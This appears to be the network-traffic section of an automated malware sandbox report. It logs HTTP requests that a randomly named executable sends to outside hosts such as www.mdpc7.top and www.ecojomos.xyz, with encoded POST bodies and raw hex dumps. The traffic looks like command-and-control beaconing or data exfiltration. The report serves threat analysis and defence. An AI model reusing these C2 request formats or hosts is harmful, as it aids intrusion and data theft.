f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                  Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                  Nov 13, 2024 15:34:42.646094084 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                  Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                  Nov 13, 2024 15:34:42.646106005 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                  Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.549990194.58.112.174803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:44.339449883 CET444OUTGET /j4lg/?tXul=U2UloNhP&2J=0mGuP4ABjbamojwwbGp4nd6DYCnF1PU82/RCQVDltajJwR32joy3yBdZ/4cT/JAxhTejF9/1KOpXB+u6q5pZeVP3rEdsFeaB8jVGPWY7QM3+gMMl8rd3lPw1Ny+3a69apQ== HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.sklad-iq.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:45.236531019 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:45 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Data Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d [TRUNCATED]
                                                                                  Data Ascii: 24f3<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.sklad-iq.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.r [TRUNCATED]
                                                                                  Nov 13, 2024 15:34:45.236546040 CET1236INData Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f
                                                                                  Data Ascii: ><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.sklad-iq.online</h1><p class="b-parking__head
                                                                                  Nov 13, 2024 15:34:45.236556053 CET1236INData Raw: d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e
                                                                                  Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_ho
                                                                                  Nov 13, 2024 15:34:45.236566067 CET1236INData Raw: 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 70 72
                                                                                  Data Ascii: i></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosti
                                                                                  Nov 13, 2024 15:34:45.236577034 CET1236INData Raw: 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f
                                                                                  Data Ascii: parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_sitebuilder"><strong class="b-title b-title_size_large-compact">
                                                                                  Nov 13, 2024 15:34:45.236587048 CET1236INData Raw: 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 66 73 73 6c 26 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 9f d0 be d0 bb d1 83 d1 87 d0 b8 d1 82 d1 8c 20 53 53 4c 3c 2f 61 3e 3c 70 20 63
                                                                                  Data Ascii: ing&utm_campaign=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop">
                                                                                  Nov 13, 2024 15:34:45.236598015 CET1236INData Raw: 20 3d 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 2b 20 27 3f 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65
                                                                                  Data Ascii: = links[ i ].href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } } var script = document.createElement('script'); var head
                                                                                  Nov 13, 2024 15:34:45.238162994 CET970INData Raw: 20 20 20 20 20 20 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 20 3d 20 74 65 78 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28
                                                                                  Data Ascii: spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>... Yandex.Metrika counter --><script type="text/java


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.54999120.2.36.112803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:51.384433031 CET691OUTPOST /a4nt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mdpc7.top
                                                                                  Origin: http://www.mdpc7.top
                                                                                  Referer: http://www.mdpc7.top/a4nt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 56 2b 47 38 63 52 41 69 31 39 71 62 70 34 6f 63 79 77 35 48 69 77 53 6e 45 53 49 57 73 32 65 36 30 58 4c 33 55 39 39 41 41 6c 56 65 38 57 7a 75 6a 64 31 43 51 33 46 4c 33 61 4c 75 4e 34 4b 38 35 56 4b 51 43 6a 62 4e 69 58 49 65 59 7a 56 34 73 37 54 61 52 2f 2f 63 79 33 49 65 34 6d 37 36 75 41 49 57 57 48 56 6c 4a 55 57 43 6f 52 65 58 66 41 76 39 64 61 6a 44 74 6b 36 43 70 4c 68 72 37 4f 69 77 48 59 35 4b 41 50 6b 43 70 6b 68 6d 41 64 42 54 49 65 79 62 37 36 55 6f 34 67 5a 56 76 5a 31 69 5a 6f 33 30 64 45 48 57 38 38 36 55 76 7a 77 50 5a 76 5a 52 77 5a 6d 4b 62 4b 6c 38 4c 43 44 30 6b 31 49 3d
                                                                                  Data Ascii: 2J=V+G8cRAi19qbp4ocyw5HiwSnESIWs2e60XL3U99AAlVe8Wzujd1CQ3FL3aLuN4K85VKQCjbNiXIeYzV4s7TaR//cy3Ie4m76uAIWWHVlJUWCoReXfAv9dajDtk6CpLhr7OiwHY5KAPkCpkhmAdBTIeyb76Uo4gZVvZ1iZo30dEHW886UvzwPZvZRwZmKbKl8LCD0k1I=
                                                                                  Nov 13, 2024 15:34:52.340709925 CET336INHTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:52 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.54999220.2.36.112803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:53.925340891 CET711OUTPOST /a4nt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mdpc7.top
                                                                                  Origin: http://www.mdpc7.top
                                                                                  Referer: http://www.mdpc7.top/a4nt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 56 2b 47 38 63 52 41 69 31 39 71 62 6f 59 59 63 31 6e 46 48 33 41 53 6b 50 79 49 57 6e 57 65 32 30 58 58 33 55 38 35 51 41 52 35 65 38 30 62 75 78 4d 31 43 54 33 46 4c 2f 36 4c 76 43 59 4b 7a 35 56 47 59 43 6e 48 4e 69 58 63 65 59 32 70 34 73 4b 54 5a 51 76 2f 6b 7a 48 4a 34 32 47 37 36 75 41 49 57 57 48 52 50 4a 51 43 43 70 67 4f 58 66 69 48 79 58 36 69 78 71 6b 36 43 74 4c 68 76 37 4f 69 53 48 5a 6c 67 41 4a 67 43 70 6c 52 6d 48 49 31 51 47 65 79 52 6c 4b 56 55 2f 44 41 2f 70 70 46 72 51 75 36 46 4b 47 4b 6a 30 71 4c 2b 31 52 34 6e 4b 50 31 70 67 4b 75 39 4b 36 45 56 52 68 54 45 36 69 63 51 35 32 46 4f 50 36 73 4c 47 67 42 6f 30 56 4b 2f 4d 76 6b 44
                                                                                  Data Ascii: 2J=V+G8cRAi19qboYYc1nFH3ASkPyIWnWe20XX3U85QAR5e80buxM1CT3FL/6LvCYKz5VGYCnHNiXceY2p4sKTZQv/kzHJ42G76uAIWWHRPJQCCpgOXfiHyX6ixqk6CtLhv7OiSHZlgAJgCplRmHI1QGeyRlKVU/DA/ppFrQu6FKGKj0qL+1R4nKP1pgKu9K6EVRhTE6icQ52FOP6sLGgBo0VK/MvkD
                                                                                  Nov 13, 2024 15:34:54.895725012 CET336INHTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:54 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.54999320.2.36.112803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:56.555814028 CET1728OUTPOST /a4nt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mdpc7.top
                                                                                  Origin: http://www.mdpc7.top
                                                                                  Referer: http://www.mdpc7.top/a4nt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 56 2b 47 38 63 52 41 69 31 39 71 62 6f 59 59 63 31 6e 46 48 33 41 53 6b 50 79 49 57 6e 57 65 32 30 58 58 33 55 38 35 51 41 51 74 65 2f 46 37 75 6a 2f 64 43 53 33 46 4c 78 61 4c 71 43 59 4b 71 35 56 65 63 43 67 4f 77 69 56 6b 65 5a 51 39 34 67 76 7a 5a 65 76 2f 6b 34 6e 4a 73 34 6d 37 6a 75 41 59 53 57 48 42 50 4a 51 43 43 70 69 6d 58 50 67 76 79 45 71 6a 44 74 6b 37 4e 70 4c 68 48 37 4f 71 6f 48 5a 51 56 44 35 41 43 70 46 42 6d 43 36 74 51 4f 65 79 66 6b 4b 56 4d 2f 44 38 6b 70 71 78 4e 51 75 6d 6a 4b 46 71 6a 6b 76 2b 54 67 6c 31 2b 56 75 64 49 76 59 4b 38 49 39 4a 32 5a 68 48 2b 2b 41 35 71 37 46 5a 32 48 63 5a 4d 54 67 63 32 32 42 6a 73 4e 4b 73 50 36 38 64 75 68 33 58 6e 79 4f 57 30 33 73 2f 6c 6d 4e 35 51 45 6a 45 57 4b 42 79 67 75 58 71 57 69 55 70 33 63 74 63 79 4e 46 53 75 76 33 50 30 76 6e 75 30 50 63 6a 36 47 6d 67 44 73 49 46 56 79 5a 43 37 65 62 35 34 55 61 2f 41 78 56 43 4a 58 62 44 79 42 72 74 75 62 68 2b 30 6f 76 58 36 58 66 6b 44 52 45 46 49 6c 35 6a 76 6f 65 67 53 6d 6d 50 [TRUNCATED]
                                                                                  Data Ascii: 2J=V+G8cRAi19qboYYc1nFH3ASkPyIWnWe20XX3U85QAQte/F7uj/dCS3FLxaLqCYKq5VecCgOwiVkeZQ94gvzZev/k4nJs4m7juAYSWHBPJQCCpimXPgvyEqjDtk7NpLhH7OqoHZQVD5ACpFBmC6tQOeyfkKVM/D8kpqxNQumjKFqjkv+Tgl1+VudIvYK8I9J2ZhH++A5q7FZ2HcZMTgc22BjsNKsP68duh3XnyOW03s/lmN5QEjEWKByguXqWiUp3ctcyNFSuv3P0vnu0Pcj6GmgDsIFVyZC7eb54Ua/AxVCJXbDyBrtubh+0ovX6XfkDREFIl5jvoegSmmP87GG7Yaem9t5eY5EVzjhPG5zuT7v6Pe5Ye8FffaYZdjctHuJ1w4eQfuz9TRIRfMao6zfnvkTYXo41Dct+a+ATaaHFMNA0tlyvHRphUgGsP2Uan0DOiQvdvfZ9ETiSmKpOAL3olDRC4rtg73Fa/QmbqiN48ojt2MLP9lBsLaEuK3ze1CDL1+UfPboktUgzV5KZXok+mYwd2egjEcKd77ptoDSE0vrZwOISeRNUfwMMOfbQLsQZtfPvqStSnMt7O7gC1M5pxQ9PjM3kxMIRcI8ypCNTYyQUI4mgFTuNwyWtbbmsTpe9QegvgtQztuwMhF7zTIIgTcvtFM3cnyWdzoaDlRutvT7mHvHn1Ze71mYeHddKHX6wVWAqoFy6Dcq9KEdr0mHW3sqo/YVgzX0WI+a6gCOFxYhonT6wdK3b50QrvouzzbZCbOaOAT+tdZutC6bazjNM8PdEKKXtksv3lo+KRpgiWME+6fWVARreWYqKmqlh2JJzB3snGipvLBiDqqDFesTR1cpJZYTVVRdC1iACh4/nHqykDNjOuhr7S/bBP8Gs0VGDEyTVSqV7aRUwOBi/6qIc1C+DQOEx716NABHErv+sC9cI/F+SD8yhyPLafbjuA2yYhwjCKzHrkd54Yoxeafuc5eS4QN9KMAGGM5I5wPu587rdRVITI [TRUNCATED]
                                                                                  Nov 13, 2024 15:34:57.504945040 CET336INHTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:57 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.54999420.2.36.112803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:59.095902920 CET438OUTGET /a4nt/?2J=Y8ucfnop1/b3pfYFq01F/gO8ESspnEO25i/hccpQHURd3Ee6lJ0YewpZ26P6KIWp1n+YeG7L7VclPhA1nqTCAuTU030Z3lnUxyF2WW91OhunyyCxSBLPY4XFmWmPj9k/og==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mdpc7.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:00.061930895 CET336INHTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:59 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.549995203.161.46.205803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:05.323255062 CET700OUTPOST /uaef/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.ecojomos.xyz
                                                                                  Origin: http://www.ecojomos.xyz
                                                                                  Referer: http://www.ecojomos.xyz/uaef/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 2b 6c 48 31 50 73 4d 6b 78 75 6f 2f 72 32 56 69 2b 34 78 64 35 4b 56 49 77 76 57 49 36 4c 69 2f 5a 44 4d 78 45 41 55 45 70 4c 31 56 5a 6a 2f 6e 41 37 30 31 66 79 44 72 70 52 4e 2b 59 59 69 55 2b 65 2b 47 4f 38 51 48 51 4b 35 73 66 2b 4e 33 53 72 59 6f 70 56 73 66 56 31 7a 67 45 62 72 44 46 71 2b 78 72 44 31 48 38 47 78 4e 6b 5a 57 4c 70 6f 45 57 42 61 6f 78 34 4b 78 79 75 53 66 6b 2b 32 49 44 37 31 4b 76 37 51 41 75 35 34 2b 54 79 54 57 30 77 70 45 39 48 56 63 43 31 32 67 4d 70 36 44 76 61 77 70 69 70 48 6f 4e 42 58 2b 62 31 50 71 70 64 6b 6e 6c 66 55 56 34 59 6c 76 32 69 55 71 34 49 71 51 3d
                                                                                  Data Ascii: 2J=+lH1PsMkxuo/r2Vi+4xd5KVIwvWI6Li/ZDMxEAUEpL1VZj/nA701fyDrpRN+YYiU+e+GO8QHQK5sf+N3SrYopVsfV1zgEbrDFq+xrD1H8GxNkZWLpoEWBaox4KxyuSfk+2ID71Kv7QAu54+TyTW0wpE9HVcC12gMp6DvawpipHoNBX+b1PqpdknlfUV4Ylv2iUq4IqQ=
                                                                                  Nov 13, 2024 15:35:05.997848034 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:05 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
